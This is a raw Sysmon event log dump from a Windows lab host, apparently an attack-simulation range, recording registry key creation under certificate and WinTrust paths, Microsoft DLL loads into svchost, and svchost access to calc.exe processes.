CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValid 12241200x800000000000000057349194Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349193Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349192Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349191Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349190Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349189Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349188Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349187Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349186Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349185Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349184Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349183Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349182Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349181Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 734700x800000000000000057349180Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.037{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.14393.2457_none_a13eaee9d8fd5c07\comctl32.dll5.82 (rs1_release_inmarket.180822-1743)Common Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMCTL32.DLLMD5=C89866876D676708892DEEA04A886CDA,SHA256=6C498F9AFFC75DFAADDACB9D1D4248862622FB2B06F0A410BA303A26FEADFF2BtrueMicrosoft WindowsValid 12241200x800000000000000057349179Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349178Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349177Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349176Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349175Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349174Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349173Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349172Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349171Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349170Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.057{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349169Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349168Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349167Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349166Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349165Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349164Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349163Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349162Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349161Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349160Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349159Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349158Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349157Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057349156Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.004{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\mintdh.dll10.0.14393.0 (rs1_release.160715-1616)Event Trace Helper LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmintdh.dllMD5=32254E75260F1CAE3AB9EAC044B344B7,SHA256=B714E3CDEB23E63894D62E9335F51E301A9093F263623CCEFA2F674AABE7D629trueMicrosoft WindowsValid 12241200x800000000000000057349155Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349154Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349153Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349152Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349151Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349150Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349149Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349148Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349147Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349146Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349145Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349144Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 734700x800000000000000057349143Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.042{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\webservices.dll10.0.14393.2312 (rs1_release.180607-1919)Windows Web Services RuntimeMicrosoft® Windows® Operating SystemMicrosoft CorporationWebServices.dllMD5=3EE43755685D59060FAC0E2F09D67686,SHA256=BF80D9B840C28BC4E8FE9A4E6DBCCCAEE37A108F83428ABA1DD780D5312369D8trueMicrosoft WindowsValid 12241200x800000000000000057349142Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349141Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349140Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349139Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349138Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 12241200x800000000000000057349137Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349136Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed 12241200x800000000000000057349135Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349134Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349133Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349132Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349131Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349130Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349129Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates 734700x800000000000000057349128Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.004{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\tdh.dll10.0.14393.4283 (rs1_release.210303-1802)Event Trace Helper LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationtdh.dllMD5=18D509F5788831270FCDA4D11E023E37,SHA256=08965C78D75432D1E1199E8162B3FB3FE11D89945B69BA48DE6F595FB280E52FtrueMicrosoft WindowsValid 12241200x800000000000000057349127Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349126Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349125Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349124Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349123Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349122Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349121Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs 12241200x800000000000000057349120Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs 12241200x800000000000000057349119Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates 12241200x800000000000000057349118Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 12241200x800000000000000057349117Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.042{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed 10341000x800000000000000057349116Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.041{8B6011A9-5BAB-618E-5CF3-04000000F101}39442932C:\Windows\system32\svchost.exe{8B6011A9-5BAB-618E-5BF3-04000000F101}9468C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+115046|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x800000000000000057349115Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.041{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 10341000x800000000000000057349114Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.041{8B6011A9-5BAB-618E-5CF3-04000000F101}394410048C:\Windows\system32\svchost.exe{8B6011A9-5BAB-618E-5DF3-04000000F101}9664C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+115046|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000057349113Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.038{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\wintrust.dll10.0.14393.4530 (rs1_release.210705-0736)Microsoft Trust Verification APIsMicrosoft® Windows® Operating SystemMicrosoft CorporationWINTRUST.DLLMD5=992BCD32EF7680C574A426FAA4933ACA,SHA256=5755AC46B4220784A6E6AC12A755CC10892A5AE59B67924576075A1A29D68B3DtrueMicrosoft WindowsValid 734700x800000000000000057349112Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 12:18:52.037{8B6011A9-5BAB-618E-5CF3-04000000F101}3944C:\Windows\System32\svchost.exeC:\Windows\System32\wldp.dll10.0.14393.3143 (rs1_release.190725-1725)Windows Lockdown PolicyMicrosoft® Windows® Operating SystemMicrosoft Corporationwldp.dllMD5=51A0208B106B4392AC4B3174B27A39EF,SHA256=EA9955976994C44DC091A07C69E9C863A4D5A960900019D3C4136BDFD1F885D4trueMicrosoft WindowsValid 12241200x800000000000000057349111Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349110Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x800000000000000057349109Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CTLs 12241200x800000000000000057349108Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\CRLs 12241200x800000000000000057349107Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 12:18:52.020{8B6011A9-887D-6164-2700-00000000F101}2856C:\Windows\sysmon64.exeHKLM\SOFTWARE\Microsoft\EnterpriseCertificates\Disallowed\Certificates 